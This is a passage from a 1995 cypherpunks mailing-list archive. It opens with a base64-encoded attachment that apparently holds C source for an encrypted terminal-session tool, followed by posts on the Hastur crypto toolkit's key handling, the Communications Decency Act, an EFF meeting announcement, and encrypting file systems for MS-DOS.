KGMpDQogICAgIGNoYXIgYzsNCnsNCglpbnQgYml0czsNCg0KCWlmIChjPT0n
OicpIHsNCgkJaWYgKHB1YnBvcyE9KHBrbGVuKzIpKSAvKiArMiBmb3IgdHJh
aWxpbmcgY2hlY2t3b3JkICovDQoJCQlnb3RvIGFib3J0Ow0KCQlpZiAobWNh
bGNrZXlzKHBrc2l6ZSk8MCkgLyogYWxzbyB2ZXJpZmllcyAqLw0KCQkJZ290
byBhYm9ydDsNCgkJY2lwaHN0YXRlPTA7DQoJCXN0YXRlPUNJUEhFUjsNCgkJ
cmV0dXJuOw0KCX0gZWxzZSBpZiAocHVicG9zPE1BWFBVQktFWSkgew0KCQli
aXRzPWF0b2goYyk7DQoJCWlmIChiaXRzPDApDQoJCQlnb3RvIGFib3J0Ow0K
CQlpZiAocHVic3RhdCkgew0KCQkJcHViYnl0ZSB8PSBiaXRzOw0KCQkJb3Ro
ZXJwdWJbcHVicG9zXT1wdWJieXRlOw0KCQkJcHVicG9zKys7DQoJCX0gZWxz
ZSB7DQoJCQlwdWJieXRlID0gYml0czw8NDsNCgkJfQ0KCQlwdWJzdGF0ID0g
MS1wdWJzdGF0Ow0KCQlyZXR1cm47DQoJfQ0KICAgIGFib3J0Og0KCWJ3cml0
ZShzdGRvdXQsIlhYWFhYWFhYWFhYWFhYWFgiLDE2KTsNCglpZiAocGFyYW5v
aWQpDQoJCWRvbmUoKTsNCglzdGF0ZT1UUkFOUzsNCn0NCg0KaW50IG1jYWxj
a2V5cyhsZW4pDQogICAgIGludCBsZW47DQp7DQoJaW50IGk7DQoJDQoJaWYg
KGRoYWdyZWUobGVuKTwwKSAvKiBzZXRzIHVwIHNlc3Npb24ga2V5cyAqLw0K
CQlyZXR1cm4gLTE7DQoJZm9yIChpPTA7IGk8ODsgaSsrKSB7DQoJCWl2aW5b
aV09MDsNCgkJaXZvdXRbaV09MHhmZjsNCgl9DQoJaWYgKGNmYjhfZGVjcnlw
dChvdGhlcnB1Yltwa2xlbl0pIHx8DQoJICAgIGNmYjhfZGVjcnlwdChvdGhl
cnB1Yltwa2xlbisxXSkpDQoJCXJldHVybiAtMTsNCglyZXR1cm4gMDsNCn0N
Cg0KaW50IHNsY2FsY2tleXMobGVuKQ0KICAgICBpbnQgbGVuOw0Kew0KCWlu
dCBpOw0KCQ0KCWlmIChkaGFncmVlKGxlbik8MCkgLyogc2V0cyB1cCBzZXNz
aW9uIGtleXMgKi8NCgkJcmV0dXJuIC0xOw0KCWZvciAoaT0wOyBpPDg7IGkr
Kykgew0KCQlpdm91dFtpXT0wOw0KCQlpdmluW2ldPTB4ZmY7DQoJfQ0KCW91
cnB1Yltwa2xlbl09Y2ZiOF9lbmNyeXB0KDApOw0KCW91cnB1Yltwa2xlbisx
XT1jZmI4X2VuY3J5cHQoMCk7DQoJcmV0dXJuIDA7DQp9DQoNCmluaXRzbGtl
eShwYXJhbSkNCiAgICAgaW50IHBhcmFtOw0Kew0KCWlmICgocGFyYW08MCkg
fHwgKHBhcmFtPjIpKQ0KCQlyZXR1cm4gLTE7DQoJcGtsZW49ZGhwYXJhbXNb
cGFyYW1dLnByaW1lTGVuOw0KCXBrc2l6ZT1wYXJhbTsNCglwdWJzdGF0PTA7
DQoJcHVicG9zPTA7DQoJcHViYnl0ZT0wOw0KfQ0KDQpzbGtleWluKGMpDQog
ICAgIGNoYXIgYzsNCnsNCglpbnQgYml0czsNCg0KCWlmIChjPT0nOicpIHsN
CgkJaWYgKHB1YnBvcyE9cGtsZW4pDQoJCQlnb3RvIGFib3J0Ow0KCQlpZiAo
Y3JlYXRlZGgocGtzaXplKTwwKQ0KCQkJZ290byBhYm9ydDsNCgkJaWYgKHNs
Y2FsY2tleXMocGtzaXplKTwwKQ0KCQkJZ290byBhYm9ydDsNCgkJc2x0cmFu
c3B1Yihwa2xlbisyKTsNCgkJY2lwaHN0YXRlPTA7DQoJCXNsb3V0c3RhdGU9
U0xfQ1JZUFQ7DQoJCXJldHVybjsNCgl9IGVsc2UgaWYgKHB1YnBvczxNQVhQ
VUJLRVkpew0KCQliaXRzPWF0b2goYyk7DQoJCWlmIChiaXRzPDApDQoJCQln
b3RvIGFib3J0Ow0KCQlpZiAocHVic3RhdCkgew0KCQkJcHViYnl0ZSB8PSBi
aXRzOw0KCQkJb3RoZXJwdWJbcHVicG9zXT1wdWJieXRlOw0KCQkJcHVicG9z
Kys7DQoJCX0gZWxzZSB7DQoJCQlwdWJieXRlID0gYml0czw8NDsNCgkJfQ0K
CQlwdWJzdGF0ID0gMS1wdWJzdGF0Ow0KCQlyZXR1cm47DQoJfQ0KICAgIGFi
b3J0Og0KCWJ3cml0ZShzdGRvdXQsIlgiLDEpOw0KCXN0YXRlPVNMX1NUQVJU
Ow0KDQp9DQoNCg0KDQppbnQgY2lwaGVyb3V0KGNoKQ0KICAgICBjaGFyIGNo
Ow0Kew0KCWludCBiaXRzOw0KCQ0KCWlmIChjaD09JyEnKSB7DQoJCWNpcGhz
dGF0ZT0wOw0KCQlyZXR1cm4gLTE7DQoJfQ0KCWJpdHM9YXRvaChjaCk7DQoJ
aWYgKGNpcGhzdGF0ZSkgew0KCQljaXBoYnl0ZSB8PSBiaXRzOw0KCQljaXBo
c3RhdGU9MDsNCgkJcmV0dXJuKGNmYjhfZGVjcnlwdChjaXBoYnl0ZSkpOw0K
CX0gZWxzZSB7DQoJCWNpcGhieXRlID0gYml0czw8NDsNCgkJY2lwaHN0YXRl
PTE7DQoJCXJldHVybiAtMTsNCgl9DQp9DQoNCmludCBjaXBoZXJjYWxjaW4o
Y2gpDQogICAgIHVuc2lnbmVkIGNoYXIgY2g7DQp7DQoJc3RhdGljIHVuc2ln
bmVkIGNoYXIgaXZbOF07DQoJc3RhdGljIHVuc2lnbmVkIGludCBjYnVmOw0K
CWludCBjOw0KCWludCBpOw0KDQoJYyA9IGF0b2goY2gpOw0KCXN3aXRjaCAo
Y3N0YXRlKSB7DQoJICAgIGNhc2UgSVYwOg0KCQlmb3IoaT0wOyBpPDg7IGkr
KykNCgkJCWl2W2ldPTA7DQoJCWNidWYgPSAoYyYweGYpPDw0Ow0KCQljc3Rh
dGU9SVYxOw0KCQlyZXR1cm4gJy4nOw0KCSAgICBjYXNlIElWMToNCgkJY2J1
ZiA9IGNidWYgfCAoYyYweGYpOw0KCQlpdls3XT1jYnVmOw0KCQljc3RhdGU9
SVYyOw0KCQlyZXR1cm4gJy4nOw0KCSAgICBjYXNlIElWMjoNCgkJY2J1ZiA9
IChjJjB4Zik8PDQ7DQoJCWNzdGF0ZT1JVjM7DQoJCXJldHVybiAnLic7DQoJ
ICAgIGNhc2UgSVYzOg0KCQljYnVmID0gY2J1ZiB8IChjJjB4Zik7DQoJCWl2
WzZdPWNidWY7DQoJCWNzdGF0ZT1DMDsNCgkJcmV0dXJuICcuJzsNCgkgICAg
Y2FzZSBDMDoNCgkJY2J1ZiA9IChjJjB4Zik8PDQ7DQoJCWNzdGF0ZT1DMTsN
CgkJcmV0dXJuICcuJzsNCgkgICAgY2FzZSBDMToNCgkJY2J1ZiA9IGNidWYg
fCBjJjB4ZjsNCgkJYz1jZmI4X2RlY3J5cHQoY2J1Zik7DQoJCWNzdGF0ZT1D
MDsNCgkJaWYgKGlzcHJpbnQoYykpIHsNCgkJCWJ3cml0ZShmcG1hc3Rlciwm
YywxKTsNCgkJCXJldHVybiAnXyc7DQoJCX0gZWxzZSB7DQoJCQlyZXR1cm4g
Jz8nOw0KCQl9DQoJICAgIGRlZmF1bHQ6DQoJCXJldHVybiAnPyc7DQoJfQ0K
fQ0KDQojaW5jbHVkZSA8c3lzL3dhaXQuaD4NCg0Kdm9pZA0KZmluaXNoKCkN
CnsNCgl1bmlvbiB3YWl0IHN0YXR1czsNCglyZWdpc3RlciBpbnQgcGlkOw0K
CXJlZ2lzdGVyIGludCBkaWUgPSAwOw0KDQoJd2hpbGUgKChwaWQgPSB3YWl0
MygoaW50ICopJnN0YXR1cywgV05PSEFORywgMCkpID4gMCkNCgkJaWYgKHBp
ZCA9PSBzdWJjaGlsZCkNCgkJCWRpZSA9IDE7DQoNCglpZiAoZGllKQ0KCQlk
b25lKCk7DQp9DQoNCmRvb3V0cHV0KCkNCnsNCglyZWdpc3RlciBpbnQgY2M7
DQoJaW50IGk7DQoJdW5zaWduZWQgY2hhciBvYnVmWzUxMl07DQoJDQoJaWYg
KChjYyA9IHJlYWQobWFzdGVyLCBvYnVmLCA1MTIpKSA+IDApIHsNCgkJc3dp
dGNoIChtb2RlKSB7DQoJCSAgICBjYXNlIFJFTU9URToNCgkJCWZvciAoaT0w
OyBpPGNjOyBpKyspDQoJCQkJZG9tYXN0ZXJvdXQob2J1ZltpXSk7DQoJCQli
cmVhazsNCgkJICAgIGNhc2UgTE9DQUw6DQoJCQlmb3IgKGk9MDsgaTxjYzsg
aSsrKQ0KCQkJCWRvc2xhdmVvdXQob2J1ZltpXSk7DQoJCQlicmVhazsNCgkJ
ICAgIGRlZmF1bHQ6DQoJCQlmb3IgKGk9MDsgaTxjYzsgaSsrKQ0KCQkJCWJ3
cml0ZShzdGRvdXQsICZvYnVmW2ldLCAxKTsNCgkJCWJyZWFrOw0KCQl9DQoJ
CWZmbHVzaChmcG1hc3Rlcik7DQoJCWZmbHVzaChzdGRvdXQpOw0KCX0gZWxz
ZQ0KCQlkb25lKCk7DQp9DQoNCmRvbWFzdGVyb3V0KG9idWYpDQogICAgIHVu
c2lnbmVkIGNoYXIgb2J1ZjsNCnsNCglpbnQgYzsNCglzdGF0aWMgaW50IGNv
dW50PTA7DQogICAgICAgIHN0cnVjdCB0aW1ldmFsIHR2Ow0KCQ0KCXN3aXRj
aCAoc3RhdGUpIHsNCgkgICAgY2FzZSBDSVBIRVI6DQoJCWM9Y2ZiOF9lbmNy
eXB0KG9idWYpOw0KCQlpZiAoISgrK2NvdW50ICUgOCkpDQoJCQlid3JpdGUo
c3Rkb3V0LCIhIiwxKTsNCgkJc2VuZGhleChzdGRvdXQsYyk7DQogICAgICAg
IAl0dj10dlBhdXNlOw0KICAgICAgICAgICAgICAgIHNlbGVjdCAoRkRfU0VU
U0laRSxOVUxMLE5VTEwsTlVMTCwmdHYpOw0KCQlicmVhazsNCgkgICAgY2Fz
ZSBUUkFOUzoNCgkJYndyaXRlKHN0ZG91dCwgJm9idWYsIDEpOw0KCQlicmVh
azsNCgkgICAgZGVmYXVsdDoNCgkJLyogdGhyb3cgYXdheSBzaW5jZSBpL28g
c2NyZXdzIHVwIGtleWluZyAqLw0KCQlicmVhazsNCgl9DQp9DQoNCg0KZG9z
bGF2ZW91dChvYnVmKQ0KICAgICB1bnNpZ25lZCBjaGFyIG9idWY7DQp7DQoJ
c3RhdGljIGludCBiYWQ9MDsNCglpbnQgYzsNCgljaGFyIGNoOw0KCQ0KCXN3
aXRjaCAoc2xvdXRzdGF0ZSkgew0KCSAgICBjYXNlIFNMX1NUQVJUOg0KCSAg
IAlid3JpdGUoc3Rkb3V0LCAmb2J1ZiwgMSk7DQoJICAgCWlmIChvYnVmPT0w
MTc3KQ0KCSAgIAkJc2xvdXRzdGF0ZT1TTF9HT1QxOw0KCSAgIAlicmVhazsN
CgkgICAgY2FzZSBTTF9HT1QxOg0KCSAgIAlid3JpdGUoc3Rkb3V0LCAmb2J1
ZiwgMSk7DQoJICAgCWlmIChvYnVmPT0nficpDQoJICAgCQlzbG91dHN0YXRl
PVNMX0dPVDI7DQoJICAgCWVsc2UNCgkgICAJCXNsb3V0c3RhdGU9U0xfU1RB
UlQ7DQoJICAgCWJyZWFrOw0KCSAgICBjYXNlIFNMX0dPVDI6DQoJICAgCWlm
IChvYnVmPT0wMTc3KQ0KCSAgIAkJc2xvdXRzdGF0ZT1TTF9HT1QzOw0KCSAg
IAllbHNlIHsNCgkgICAJCWJ3cml0ZShzdGRvdXQsICZvYnVmLCAxKTsNCgkg
ICAJCXNsb3V0c3RhdGU9U0xfU1RBUlQ7DQoJICAgCX0NCgkgICAJYnJlYWs7
DQoJICAgIGNhc2UgU0xfR09UMzoNCgkgICAJaWYgKG9idWY9PSd+JykNCgkg
ICAJCXNsb3V0c3RhdGU9U0xfR09UNDsNCgkgICAJZWxzZSB7DQoJICAgCQli
d3JpdGUoc3Rkb3V0LCAmb2J1ZiwgMSk7DQoJICAgCQlzbG91dHN0YXRlPVNM
X1NUQVJUOw0KCSAgIAl9DQoJICAgCWJyZWFrOw0KCSAgICBjYXNlIFNMX0dP
VDQ6IC8qIGtleSBzaXplIGluZGljYXRvciAqLw0KCSAgIAlid3JpdGUoc3Rk
b3V0LCAmb2J1ZiwgMSk7DQoJICAgCWlmIChvYnVmPT0nUycpIHsNCgkgICAJ
CWluaXRzbGtleShTSE9SVCk7DQoJICAgCQlzbG91dHN0YXRlPVNMX0tFWUlO
RzsNCgkgICAJfSBlbHNlIGlmIChvYnVmPT0nTScpIHsNCgkgICAJCWluaXRz
bGtleShNRURJVU0pOw0KCSAgIAkJc2xvdXRzdGF0ZT1TTF9LRVlJTkc7DQoJ
ICAgCX0gZWxzZSBpZiAob2J1Zj09J0wnKSB7DQoJICAgCQlpbml0c2xrZXko
TE9ORyk7DQoJICAgCQlzbG91dHN0YXRlPVNMX0tFWUlORzsNCgkgICAJfSBl
bHNlDQoJICAgCQlzbG91dHN0YXRlPVNMX1NUQVJUOw0KCSAgIAlicmVhazsN
CgkgICAgY2FzZSBTTF9LRVlJTkc6DQoJICAgCWlmIChzdHJjaHIoIjAxMjM0
NTY3ODlhYmNkZWY6IixvYnVmKSAhPSBOVUxMKSB7DQoJICAgCQlzbGtleWlu
KG9idWYpOw0KCSAgIAl9IGVsc2Ugew0KCSAgIAkJYndyaXRlKHN0ZG91dCwi
VSIsMSk7DQoJICAgCQlzbG91dHN0YXRlPVNMX1NUQVJUOw0KCSAgIAl9DQoJ
ICAgCWJyZWFrOw0KCSAgICBjYXNlIFNMX0NSWVBUOg0KCSAgIAlpZiAoc3Ry
Y2hyKCIwMTIzNDU2Nzg5YWJjZGVmISIsb2J1ZikgIT0gTlVMTCkgew0KCSAg
IAkJYmFkPTA7DQoJICAgCQlpZiAoKGMgPSBjaXBoZXJvdXQob2J1ZikpPj0w
KSB7DQoJICAgCQkJY2g9YzsNCiAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgaWYgKGNoIT1maWxsZXIpDQoJCSAgIAkJCWJ3cml0ZShzdGRvdXQs
JmNoLDEpOw0KCSAgIAkJfQ0KCSAgIAl9IGVsc2UgaWYgKGJhZCsrID4gOCkg
ew0KCSAgIAkJZnByaW50ZihzdGRlcnIsIlxyXG5FbmNyeXB0ZWQgc2Vzc2lv
biB0ZXJtaW5hdGVkIC0iKTsNCgkgICAJCWZwcmludGYoc3RkZXJyLCJcclxu
cHJlc3MgZW50ZXIgZm9yIENMRUFSVEVYVCBtb2RlOiAiKTsNCgkgICAJCXdh
aXRlbnRlcigpOw0KCSAgIAkJZGVsa2V5KCk7DQoJICAgCQlzbG91dHN0YXRl
PVNMX1NUQVJUOw0KCSAgIAl9IGVsc2UNCgkgICAJCWNpcGhzdGF0ZT0wOw0K
CSAgIAlicmVhazsNCgkgICAgZGVmYXVsdDoNCgkgICAJYndyaXRlKHN0ZG91
dCwgJm9idWYsIDEpOw0KCSAgIAlicmVhazsNCgl9DQp9DQoNCg0KDQpkb3No
ZWxsKCkgDQp7DQoJaW50IHQ7DQoNCgkvKioqDQoJdCA9IG9wZW4oX1BBVEhf
VFRZLCBPX1JEV1IpOw0KCWlmICh0ID49IDApIHsNCgkJKHZvaWQpIGlvY3Rs
KHQsIFRJT0NOT1RUWSwgKGNoYXIgKikwKTsNCgkJKHZvaWQpIGNsb3NlKHQp
Ow0KCX0NCgkqKiovDQoJZ2V0c2xhdmUoKTsNCgkodm9pZCkgY2xvc2UobWFz
dGVyKTsNCgkodm9pZCkgZHVwMihzbGF2ZSwgMCk7DQoJKHZvaWQpIGR1cDIo
c2xhdmUsIDEpOw0KCSh2b2lkKSBkdXAyKHNsYXZlLCAyKTsNCgkodm9pZCkg
Y2xvc2Uoc2xhdmUpOw0KCWlmIChjbWQ9PU5VTEwpDQoJCWV4ZWNsKHNoZWxs
LCAic2giLCAiLWkiLCAwKTsNCgllbHNlDQoJCXN5c3RlbShjbWQpOw0KCXBl
cnJvcihzaGVsbCk7DQoJZmFpbCgpOw0KfQ0KDQpyYXd0dHkoKQ0Kew0KDQoJ
c3RydWN0IHRlcm1pb3Mgc2J1ZjsNCg0KICAgICAgICBzYnVmID0gdHQ7DQog
ICAgICAgIHNidWYuY19pZmxhZyAmPSB+KElOTENSfElHTkNSfElDUk5MfElY
T04pOw0KICAgICAgICBzYnVmLmNfb2ZsYWcgJj0gfk9QT1NUOw0KICAgICAg
ICBzYnVmLmNfbGZsYWcgJj0gfihJQ0FOT058SVNJR3xFQ0hPKTsNCiAgICAg
ICAgc2J1Zi5jX2NjW1ZNSU5dID0gMTsNCiAgICAgICAgc2J1Zi5jX2NjW1ZU
SU1FXSA9IDA7DQoJKHZvaWQpIHRjc2V0YXR0cigwLCBUQ1NBRkxVU0gsICZz
YnVmKTsNCn0NCg0KY29va2VkdHR5KCkNCnsNCgkodm9pZCkgdGNzZXRhdHRy
KDAsIFRDU0FGTFVTSCwgJnR0KTsNCn0NCg0KZmFpbCgpDQp7DQoNCgkodm9p
ZCkga2lsbCgwLCBTSUdURVJNKTsNCglkb25lKCk7DQp9DQoNCmRvbmUoKQ0K
ew0KCWNvb2tlZHR0eSgpOw0KCXN3aXRjaCAobW9kZSkgew0KCSAgICBjYXNl
IFJFTU9URToNCgkJaWYgKHN0YXRlPT1DSVBIRVIpDQoJCQlwcmludGYoIlhY
WFhYWFhYWFhYWFhYWFhcbiIpOw0KCQlwcmludGYoImxlc20gcmVtb3RlICIp
Ow0KCQlicmVhazsNCgkgICAgY2FzZSBMT0NBTDoNCgkJcHJpbnRmKCJsZXNt
IGxvY2FsICIpOw0KCQlicmVhazsNCgl9DQoJcHJpbnRmKCJkb25lXG4iKTsN
CglleGl0KDApOw0KfQ0KDQpnZXRtYXN0ZXIoKQ0Kew0KCWNoYXIgKnB0eSwg
KmJhbmssICpjcDsNCglzdHJ1Y3Qgc3RhdCBzdGI7DQoNCglwdHkgPSAmbGlu
ZVtzdHJsZW4oIi9kZXYvcHR5cCIpXTsNCglmb3IgKGJhbmsgPSAicHFyc3R1
dnd4eXoiOyAqYmFuazsgYmFuaysrKSB7DQoJCWxpbmVbc3RybGVuKCIvZGV2
L3B0eSIpXSA9ICpiYW5rOw0KCQkqcHR5ID0gJzAnOw0KCQlpZiAoc3RhdChs
aW5lLCAmc3RiKSA8IDApDQoJCQlicmVhazsNCgkJZm9yIChjcCA9ICIwMTIz
NDU2Nzg5YWJjZGVmIjsgKmNwOyBjcCsrKSB7DQoJCQkqcHR5ID0gKmNwOw0K
CQkJbWFzdGVyID0gb3BlbihsaW5lLCBPX1JEV1IpOw0KCQkJaWYgKG1hc3Rl
ciA+PSAwKSB7DQoJCQkJY2hhciAqdHAgPSAmbGluZVtzdHJsZW4oIi9kZXYv
IildOw0KCQkJCWludCBvazsNCg0KCQkJCS8qIHZlcmlmeSBzbGF2ZSBzaWRl
IGlzIHVzYWJsZSAqLw0KCQkJCSp0cCA9ICd0JzsNCgkJCQlvayA9IGFjY2Vz
cyhsaW5lLCBSX09LfFdfT0spID09IDA7DQoJCQkJKnRwID0gJ3AnOw0KCQkJ
CWlmIChvaykgew0KCQkJCQkodm9pZCkgdGNnZXRhdHRyKDAsICZ0dCk7DQoJ
CQkJICAgIAkodm9pZCkgaW9jdGwoMCwgVElPQ0dXSU5TWiwgDQoJCQkJCQko
Y2hhciAqKSZ3aW4pOw0KCQkJCQlyZXR1cm47DQoJCQkJfQ0KCQkJCSh2b2lk
KSBjbG9zZShtYXN0ZXIpOw0KCQkJfQ0KCQl9DQoJfQ0KCWZwcmludGYoc3Rk
ZXJyLCAiT3V0IG9mIHB0eSdzXG4iKTsNCglmYWlsKCk7DQp9DQoNCmdldHNs
YXZlKCkNCnsNCg0KCWxpbmVbc3RybGVuKCIvZGV2LyIpXSA9ICd0JzsNCglz
bGF2ZSA9IG9wZW4obGluZSwgT19SRFdSKTsNCglpZiAoc2xhdmUgPCAwKSB7
DQoJCXBlcnJvcihsaW5lKTsNCgkJZmFpbCgpOw0KCX0NCgkodm9pZCkgdGNz
ZXRhdHRyKHNsYXZlLCBUQ1NBRkxVU0gsICZ0dCk7DQoJKHZvaWQpIGlvY3Rs
KHNsYXZlLCBUSU9DU1dJTlNaLCAoY2hhciAqKSZ3aW4pOw0KCSh2b2lkKSBz
ZXRzaWQoKTsNCgkodm9pZCkgaW9jdGwoc2xhdmUsIFRJT0NTQ1RUWSwgMCk7
DQp9DQoNCndhaXRlbnRlcigpDQp7DQoJdW5zaWduZWQgY2hhciBiOw0KCWRv
IHsNCgkJcmVhZCgwLCZiLDEpOw0KCX0gd2hpbGUgKGIhPSdccicpOw0KCXBy
aW50ZigiXHJcbiIpOw0KfQ0KDQpzZW5kaGV4KGZwLGMpDQogICAgIEZJTEUg
KmZwOw0KICAgICB1bnNpZ25lZCBpbnQgYzsNCnsNCglzdGF0aWMgY2hhciBi
dWZbMTZdOw0KDQoJc3ByaW50ZihidWYsIiUwMngiLGMpOw0KCWJ3cml0ZShm
cCxidWYsMik7DQp9DQo=
--Boundary..3926.1071713479.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Thu, 9 Feb 95 11:44:32 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Encryption Module
Message-ID: <199502091940.OAA10609@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9502090612.E21224-0100000@lia.bga.com>,
Nathan Zook <nzook@bga.com> wrote:
>As I've considered this problem, I've arrived at essentially the same
>conclusion.  We need an RSA-IDEA package that does something very close to
>Mixmaster.

I'm a-hackin' as fast as I can!

Seriously, this is exactly what I had in mind when I started out on the
Hastur Crypto Toolkit.  Data formats will be parameterized, with parameters
for well-known systems like PGP included with at least minimal
auto-selection support.

See the Hastur Status thread for the one real problem that isn't just a
SMOP: key management.
- --
Todd Masco     | "No matter how peculiar the medium or incongruous the scale,
cactus@hks.net |   the instinct to build persists."   - Joy Of Cooking
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzpvqSoZzwIn1bdtAQG2+AGA2mP0eRIcgMKBAaeeMPr2Ik/mTN1SZ5y8
9MA8dM11fOvKah/EJRMwaTZ2RGuE/bv6
=r9eh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 9 Feb 95 15:13:35 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502091458.JAA26730@libws4.ic.sunysb.edu>
Message-ID: <Pine.3.89.9502091515.A5767-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:
> It's not a mandate. It's an order from god. (As if you didn't know, it
> says in the bible that the Republican party is his official mouthpiece.)

Exon, who is the primary sponsor and spokesman for the 
"Communications Decency Act" is a tax-and-spend Democrat.

This conforms to my expectations, prejudices, and assumptions
about the way the world works.

I assume your prejudices are different.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Thu, 9 Feb 95 15:56:12 PST
To: gnu@toad.com
Subject: Wed 15 Feb, 730pm: BayFF's first monthly Bay Area EFF meeting
Message-ID: <9502092356.AA05230@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


EFF is pleased to introduce a series of monthly `BayFF' meetings in
the San Francisco Bay Area.  All EFF members, guests, and the public
are invited.

The first meeting will be in San Francisco on February 15, 1995, at
7:30PM.  The gracious donor of our first meeting place is:

	Wired Magazine
	520 Third Street, Fourth Floor
	San Francisco, CA
	+1 415 222 6200  voice

John Gilmore and Cindy Cohn will speak on the constitutional issues
around export controls on cryptography.  John is a co-founder of EFF
and Chair of the EFF Board's Crypto Committee.  Cindy is an attorney
in private practice at McGlashen and Sarrail in San Mateo.  These
controls inhibit free speech, publication of software and papers,
academic freedom of inquiry, and personal privacy, as well as having a
strong negative impact on computer security.  We'll explore some of
the implications and prospects for change.

Dave Farber will speak on "Living in the Global Information
Infrastructure -- some concerns".  Dave is an EFF Board member and has
more years of experience in computers and networking than the total
experience at many startup companies.  Vice President Gore has proposed
that the nations of the world undertake the building of a Global
Information Infrastructure -- the GII.  While most leaders agree with
the sprit of the Gore proposal -- namely to provide a mechanism which
could invigorate the world economy in the forthcoming information age,
many disagree with his belief that it will bring democracy to the
world.  They interpret such statements as being another example of
American colonialism.  It is this basic lack of uniform global
agreement on what terms mean, what rules apply to electronic commerce
and what impact a GII will have on their nation that underlies the
comments Dave will make.  These raise questions about the universality
of Cyberspace.  He will seek to table a set of questions that may
stimulate your thinking in this area.

There will also be plenty of time for general and specific questions,
issues, discussion, meeting people, and socializing with frontier-
minded folks.

We will schedule the second monthly meeting near the Computers,
Freedom, and Privacy conference -- tentatively on Friday night,
March 31.  Watch this space for more information.

We hope to see you on Wednesday!

	John Gilmore
	Jane Metcalfe
	Denise Caruso
	(Bay Area members of the EFF Board)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A Loose Affiliation of Millionaires and Billionaires and Babies <cactus@hks.net>
Date: Thu, 9 Feb 95 16:57:51 PST
To: cypherpunks@toad.com
Subject: Key management in Hastur
Message-ID: <199502092115.QAA11291@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Eric, if I understand you correctly, you're saying that the manner in
which trust is bestowed in keys should not be generalized.  Is this
correct?  I don't have a problem with that, and wasn't terribly interested
in defining trust parameters.  I do want to finish this in the next 4 to 6
weeks, after all.

However, that's not exactly the problem I'm trying to solve;  The phrase
"key management" is likely too vague or perhaps has specific connotations
that I'm unaware of, such that I'm using it wrongly.  I was never strong
on jargon, and "key management" is the phrase that came closest to an
expression of the problem I'm trying to solve.

The problem is this: You have a bitstream and you want to perform
a cryptographic function on it.  Therefore, you need a key.  For RSA
functions, I know of two different ways that keys are distributed:
PGP and X.509.  My intent is to support PGP keyrings and PEM-style
keyrings (I am not yet familiar with the latter)... having a way to
place keys into their proper keyrings would be nice, too, but there's
no way I'm going to worry about that in the first rev.  Would I be
understanding you correctly if I characterized your advice as being
to not plan to implement that at all?

There are two ways that I could approach handling keys in the code:

	1- Have a general RSA key format.  The would include parameters
	that are defined in either PGP and X.509 keys and would allow
	the code to hand back warnings such as "this key is not trusted
	by you" and "this key has expired."  This seems to be what you're
	advising against... 

	2- Have only a bare-bones key format that includes only the
	information necessary for crypto functions.  This is the way
	I'm leaning for several reasons, not the least of which is
	what you cite.

In either case, there must be an import function, extracting the key from
the appropriate keyrings or otherwise supplying the key.  Including functions
that extract keys from the appropriate PGP/PEM keyrings would be a Good
Thing and is right now The Plan: one can hardly expect the code to get
used if it needs Yet Another (undefined) Key Distribution method.

My X.509 vs PGP key question boils down to this: is it reasonable to try to
convert keys of one sort into keys of the other sort, providing the
functionality of converting a key obtained through an X.509 certificate
into a PGP-key?  Converting the other seems like a less desirable thing
to do, so I'm not really thinking about that problem.

I should note that in all cases in HCT where something is parameterized,
the caller can supply a callback function that matches the defined
interface and expect to win.  Thus, it's already supported (in the
general interface and soon the key handling) that a user could say
(in pseudo C code, missing parameters):

	erics_key_stub_fn(char *id, struct keytype *key, ...);

	...
	struct keytype *thiskey;
	thiskey = keyinit( KEYTYPE_RSA, (void *) erics_key_stub_fn, ...);
	if (!(get_key( thiskey, "eric@remailer.net",...))) {
          /* ... Do the right thing, etc. */
        }

Are we on a similar wavelength here, or am I totally missing the point?
The input is appreciated.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzqEYCoZzwIn1bdtAQHUcwF/QO2s178YMsxdSWQj6UDDErCDRv6+gaB5
CJnEyrRPwpS8jqRLOSDQmyjHDvOJbJS2
=xm8Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Thu, 9 Feb 95 06:47:05 PST
To: ecarp@netcom.com
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <m0rcZRT-0004IhC@s116.slcslip.indirect.com>
Message-ID: <Pine.NEB.3.91.950209162432.23367N-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


I don't know which is the "best" encrypting file system for MS-DOS.  I
currently use Peter Gutmann's SFS, and am very happy with it.  I have used
SecureDevice (from Max Loewenthal and Arthur Helwig) in the past, and
found it painfully slow on my 25MHz 386SX.  I also know of Mike Ingle's
SecureDrive, but I have not used it.  SFS and SecureDrive require a
